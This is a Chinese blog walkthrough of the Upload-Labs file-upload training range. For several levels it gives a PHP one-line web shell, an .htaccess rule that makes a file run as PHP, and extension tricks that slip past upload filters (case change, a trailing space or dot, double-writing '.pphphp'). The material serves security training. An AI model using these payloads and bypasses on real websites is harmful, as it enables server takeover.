upload-lab
Upload-Lab 通关write up
这里给一个集成的环境,有需要可自行下载:upload-up 提取码:c267
Write Up
Pass-1


a.jpg
<?php @eval($_POST(['shell']));?>

也可以不抓包,直接在按F12打开开发者工具,点击调试器

Pass-2

需要
上传 a.php(一句话木马),抓包修改
Pass-3

这一关可能会出现不解析问题,可参考这篇文章:https://www.cnblogs.com/Article-kelp/p/14927087.html
Pass-4

.htaccess(将文件名为a的文件当成php解析)
<FilesMatch "a"> SetHandler application/x-httpd-php </FilesMatch>
上传a.jpg(一句话木马)
Pass-5
没有过滤大小写

直接上传a.php,抓包修改扩展名为.Php
Pass-6
没有去空格

扩展名改为.php (注意后面有一个空格)
其他同上一关
Pass-7
未过滤点

其他同上
Pass-8

其他同上
Pass-9

Pass-10
黑名单被换为空
双写绕过
抓包改扩展名为.pphphp

文件上传靶场搭建、write up、注意事项
浙公网安备 33010602011771号